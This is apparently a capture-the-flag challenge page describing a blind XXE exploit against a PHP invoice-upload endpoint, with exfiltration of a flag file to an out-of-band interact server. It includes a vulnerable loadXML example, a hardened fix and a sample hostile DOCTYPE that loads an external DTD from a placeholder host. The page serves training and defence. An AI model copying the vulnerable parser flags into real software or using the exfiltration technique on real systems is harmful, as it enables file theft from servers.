hardXXEFree

Margins & Sons CPA

Margins & Sons CPA accepts your invoice batch as an .xml upload, files it for processing, and tells you nothing else. Their bookkeeper is thorough — perhaps too thorough.

The Scenario

Margins & Sons CPA has filed quarterlies for mid-sized Cleveland firms since 1986 — three partners, a bullpen of CPAs, and a client portal the senior partner's nephew stood up in 2003 and has been "good enough" ever since. Clients submit their invoice batches as XML for processing, the receipt screen says "submitted for processing," and nothing else ever comes back. Whatever the portal does with the file after that is between the portal and the bookkeeper.

Challenge Intel

Synopsis

Blind XXE via external DTD parameter-entity exfiltration over OOB HTTP to the interact server.

What It Is

The /upload.php endpoint feeds the player-supplied XML straight into PHP's DOMDocument::loadXML with LIBXML_DTDLOAD | LIBXML_NOENT (the two flags that, together, fetch external DTDs and substitute entity references), and never reflects any parsed content in the response, which is what makes the XXE blind. To pull /flag.txt out, the player must host an external DTD on the interact server that uses the classic parameter-entity wrapper trick: read the flag with file://, embed it as a parameter to a second SYSTEM entity pointing at an interact URL, and trigger expansion from the submitted invoice. The flag arrives as a URL parameter in the interact server's HTTP request log.
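For readers who want to see the parser misconfiguration behind this challenge next to its fix, the following is an added example, not the challenge's own source: the loadXML call with the two flags named above, beside a hardened version that refuses any DOCTYPE, makes every external entity fetch fail, and logs the attempt so the upload endpoint is no longer silent to its own operators. The function names, the interact-host placeholder and the two sample documents are assumptions constructed for this illustration.

```php
<?php
// Added example (not the challenge's source). Function names are assumed.

// Vulnerable shape, as the challenge describes it: DTD loading and entity
// substitution are both on, and nothing parsed is ever echoed back, so the
// only channel out is an external SYSTEM entity resolved by the parser.
function parse_invoice_batch_unsafe(string $xml): DOMDocument
{
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_DTDLOAD | LIBXML_NOENT); // resolves SYSTEM entities
    return $dom;
}

// Hardened shape: returns null (and logs) for anything that is not a plain
// invoice document.
function parse_invoice_batch_safe(string $xml): ?DOMDocument
{
    // 1. An invoice batch has no business carrying a DOCTYPE; refuse it before
    //    the parser ever sees the internal subset. This is also the detection
    //    hook: a DOCTYPE on this endpoint is an alert, not a parse error.
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        error_log('invoice upload rejected: DOCTYPE present');
        return null;
    }

    // 2. Belt and braces: make every external DTD/entity fetch fail, so even a
    //    DOCTYPE that slipped past step 1 cannot reach file:// or the network.
    libxml_set_external_entity_loader(function (?string $public, ?string $system, array $context) {
        error_log('invoice upload: blocked external entity fetch for ' . ($system ?? '?'));
        return null; // null means "could not load"; libxml reports it as an error
    });

    $prev = libxml_use_internal_errors(true); // collect errors instead of emitting warnings
    $dom = new DOMDocument();
    // No LIBXML_NOENT, no LIBXML_DTDLOAD; LIBXML_NONET additionally forbids network access.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    libxml_set_external_entity_loader(null); // restore the default loader for other code

    if (!$ok || $errors !== [] || $dom->doctype !== null) {
        return null;
    }
    return $dom;
}

// Constructed sample inputs (not from the challenge).
$benign = '<?xml version="1.0"?>'
    . '<invoices><invoice id="1001"><total>125.00</total></invoice></invoices>';
$hostile = '<?xml version="1.0"?>'
    . '<!DOCTYPE invoices [<!ENTITY % ext SYSTEM "http://INTERACT-HOST-PLACEHOLDER/x.dtd"> %ext;]>'
    . '<invoices/>';

var_dump(parse_invoice_batch_safe($benign) !== null);  // benign batch parses
var_dump(parse_invoice_batch_safe($hostile) !== null); // DOCTYPE batch is refused and logged
```

The hardened function never echoes parser output either, so the response stays as opaque as the challenge's; the difference is that the upload can no longer cause the server to fetch anything, and the rejection is written to the server's own log rather than the attacker's.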

Who It's For

Advanced testers comfortable with blind XXE, parameter entities, external DTD chaining, and out-of-band recovery.

Skills You'll Practice

  • Blind XXE exploitation against PHP DOMDocument
  • Crafting an external DTD that nests SYSTEM entities through parameter-entity expansion
  • Out-of-band data exfiltration over HTTP
  • Reading interact-server logs to recover exfiltrated data
  • Reasoning about silent XML pipelines that never reflect content

What You'll Gain

  • A working OOB XXE workflow end-to-end against a realistic upload endpoint
  • A reusable external-DTD template for blind exfil
  • Comfort using the platform's interact subdomain to recover flags from opaque servers
  • A benchmark solve for serious XXE capability
